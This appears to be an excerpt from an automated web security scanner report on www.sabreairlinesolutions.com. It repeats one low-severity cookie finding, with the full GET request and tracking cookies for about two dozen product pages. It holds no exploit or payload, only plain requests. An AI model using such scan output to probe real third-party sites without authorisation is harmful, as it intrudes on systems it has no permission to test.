The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_crew_qualifier HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322609; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Fcorporate_management%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fares_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_flight_explorer HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_explorer/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322610; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fproducts_services%2Fsabre_emd_manager%2F%22%3Bi%3A2%3Bs%3A39%3A%22%2Fproducts_services%2Fsabresonic_check-in%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A4%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_flight_plan_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322615; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_gate_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322603; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3Bi%3A1%3Bs%3A35%3A%22%2Fproducts_services%2Fsabresonic_sell%2F%22%3Bi%3A2%3Bs%3A54%3A%22%2Fproducts_services%2Fsabre_airvision_revenue_accounting%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_gate_planner HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_planner/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322604; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fproducts_services%2Fsabre_emd_manager%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts_services%2Fsabresonic_check-in%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_load_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322610; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fproducts_services%2Fsabresonic_web%2F%22%3Bi%3A3%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_movement_control HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322615; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fproducts_services%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_movement_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322616; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A2%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3Bi%3A3%3Bs%3A35%3A%22%2Fproducts_services%2Fsabresonic_sell%2F%22%3Bi%3A4%3Bs%3A54%3A%22%2Fproducts_services%2Fsabre_airvision_revenue_accounting%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_recovery_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_recovery_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322610; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fsabresonic_inventory%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fagency_management%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_roster_maker HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_roster_maker/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322605; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A54%3A%22%2Fproducts_services%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts_services%2Fsabresonic_web%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_staff_admin HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_admin/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322605; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fproducts_services%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_staff_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322607; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fcorporate_management%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A4%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_staff_planner HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_planner/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322603; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fsabresonic_inventory%2F%22%3Bi%3A2%3Bs%3A37%3A%22%2Fproducts_services%2Fagency_management%2F%22%3Bi%3A3%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_airport_data_intelligence HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airport_data_intelligence Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323085; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_airvision_cargo_revenue_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_cargo_revenue_manager Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323085; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_airvision_codeshare_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_codeshare_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_airvision_fleet_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322569; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_airvision_group_ecommerce HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_group_ecommerce/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322575; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_airvision_in-flight HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_airvision_revenue_accounting HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_revenue_accounting/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322575; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_airvision_revenue_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_revenue_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322578; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_community_portal HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_emd_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_emd_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322599; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts_services%2Fsabresonic_check-in%2F%22%3Bi%3A1%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
